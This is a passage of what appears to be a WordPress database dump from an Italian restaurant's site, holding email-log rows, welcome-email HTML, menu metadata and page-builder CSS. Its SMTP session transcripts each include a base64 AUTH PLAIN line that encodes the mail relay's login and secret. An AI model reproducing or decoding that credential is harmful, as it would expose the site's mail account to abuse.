-->=0A=09=09=09=09=09=09=09=09</td>=0A=\r\n=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td ali=\r\ngn=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=\r\n=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\"=\r\n width=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=\r\n=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radi=\r\nus: 6px;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=\r\n=3D\"10\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"m=\r\niddle\" id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969=\r\n696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif=\r\n; font-size: 12px; line-height: 150%; text-align: center; padding: 24px=\r\n 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px=\r\n;\">Sol Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09</table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</=\r\ntr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=\r\n=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09=\r\n</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as d3289c01-f326-43d9-aa0c-47329d550a89\r\n'),(58607,4624,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(44567,3974,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(44568,3040,'_yoast_wpseo_estimated-reading-time-minutes','5'),(44572,3976,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}'),(44593,3981,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(44594,3981,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<yxyzxxfsdvx@sdemo.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: yxyzxxfsdvx@sdemo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <d94e7d8c3be249afc27aef3b03b3bd41@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Thu, 21 Jan 2021 20:37:49 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi yxyzxxfsdvx,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>yxyzxxfsdvx</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK queued as ecbe0cf0-6a9b-4ea6-a9f1-fe739f3177fe\r\n'),(44595,3982,'solution','All good, mail sent.'),(44596,3982,'success','1'),(44597,3982,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(44598,3982,'to_header','webmaster@baldisserri.com'),(44599,3982,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(44600,3982,'original_to','webmaster@baldisserri.com'),(44601,3982,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(44602,3982,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Smash Balloon Instagram Feed (from version 2.6.2 to 2.7)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(44603,3982,'original_headers',''),(44604,3982,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ffda37753ecb4ebe19949ca3f9c7ba91@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Fri, 22 Jan 2021 00:29:20 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Smas=\r\nh Balloon Instagram Feed (from version 2.6.2 to 2.7)=0A=0A=0AIf you expe=\r\nrience any issues or need support, the volunteers in the WordPress.org s=\r\nupport forums may be able to help.=0Ahttps://wordpress.org/support/forum=\r\ns/=0A=0AThe WordPress Team\r\n.\r\n250 OK queued as 2f8adc10-a25b-4d82-9484-de7bef26e775\r\n'),(44611,3984,'_menu_item_xfn',''),(44612,3984,'_menu_item_url',''),(44614,3985,'_menu_item_type','post_type'),(44615,3985,'_menu_item_menu_item_parent','3984'),(44616,3985,'_menu_item_object_id','36'),(44617,3985,'_menu_item_object','page'),(44618,3985,'_menu_item_target',''),(44619,3985,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(44620,3985,'_menu_item_xfn',''),(44621,3985,'_menu_item_url',''),(44628,3986,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(44629,3986,'original_to','tjxkptpcknz@sdemo.com'),(44630,3986,'original_subject','Your Sol Y Mar account has been created!'),(44631,3986,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi tjxkptpcknz,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>tjxkptpcknz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(44632,3986,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(44633,3986,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<tjxkptpcknz@sdemo.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.19 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: tjxkptpcknz@sdemo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <75bfc6dd6bba027a4a7b7101ff6327a1@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Fri, 22 Jan 2021 10:00:36 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi tjxkptpcknz,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>tjxkptpcknz</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a 